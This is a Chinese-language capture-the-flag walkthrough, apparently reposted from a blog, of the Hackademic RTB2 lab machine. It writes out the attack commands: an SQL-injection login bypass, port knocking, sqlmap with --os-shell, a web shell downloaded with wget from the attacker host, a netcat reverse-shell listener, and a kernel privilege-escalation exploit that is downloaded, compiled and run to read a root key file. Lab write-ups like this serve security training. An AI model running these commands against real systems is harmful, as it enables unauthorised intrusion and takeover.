码迷,mamicode.com
首页 > 其他好文 > 详细

Hackademic: RTB2

时间:2020-07-10 17:09:19      阅读:93      评论:0      收藏:0      [点我收藏+]

标签:iptables   iar   序列   内核   block   txt   端口扫描   use   上传   

Description

  • Name: Hackademic: RTB2
  • Date release: 6 Sep 2011
  • DHCP service: Enabled
  • IP address: Automatically assign
  • Task:get root and read the file key.txt

Download

(Size: 951 MB)

主机发现

nmap -sP 192.168.91.1/24

靶机IP:192.168.91.133

端口扫描

nmap -sV -p- 192.168.91.133

80端口(http)是开启的,还有个666/tcp filtered doom

漏洞发现

访问80端口Web服务

技术图片

使用万能密码登录‘or 1=1--‘

技术图片

得到一串字符编码,发送的Decoder进行解码,URL-->ASCII

技术图片

关键点:K n o c k K n o c k K n o c k i n ‘ o n h e a v e n ‘ s d o o r . . : )

端口敲门服务

该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

将上面的二进制转为字符串,得到1001:1101:1011:1001

nmap -p 1001,1101,1011,1001 192.168.91.135  # IP变了下

技术图片

此时666端口就开启了,访问

技术图片

得到的是一个joomla站点,通过msf发现SQL注入漏洞

root# search joomla_plugins
root# use auxiliary/scanner/http/joomla_plugins
root# set rhosts 192.168.91.137
root# ser rport 666
root# run

技术图片

/index.php?option=com_abc&view=abc&letter=AS&sectionid=‘

漏洞利用

使用sqlmap

sqlmap -u "http://192.168.91.137:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" --dbs --batch

技术图片

sqlmap -u "http://192.168.91.137:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" -D joomla --os-shell --batch

技术图片

getshell

启动一个python服务器上传shell,目录在/use/share/webshells/php,修改ip地址为Kali的IP地址

python -m SimpleHTTPServer 80
wget http://192.168.91.136/shell.php

技术图片

监听1234端口

nc -lvp 1234

访问:http://192.168.91.137:666/shell.php,成功反弹shell

技术图片

使用python更换shell

python -c ‘import pty;pty.spawn("/bin/bash")‘

提权

查看内核版本:

www-data@HackademicRTB2:/$ uname -a
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux

具体参考:http://ne2ha.top/202006242/, exp为15285.c,需要先切换到/tmp目录下

wget http://192.168.91.136/15285.c

技术图片

编译执行:

gcc 15285.c -o kernel
chmod 777 kernel
./kernel

技术图片

查找Key.txt文件在/root目录下,查看文件内容

技术图片

很明显的base64编码,将其解码

base64 -d Key.txt > key

通过cat查看得到的是一堆乱码,通过file指令得知是png图片,将其复制到/var/www目录下,然后访问:http://192.168.91.137:666/key.png

技术图片

Hackademic: RTB2

标签:iptables   iar   序列   内核   block   txt   端口扫描   use   上传   

原文地址:https://www.cnblogs.com/CH42e/p/13279925.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!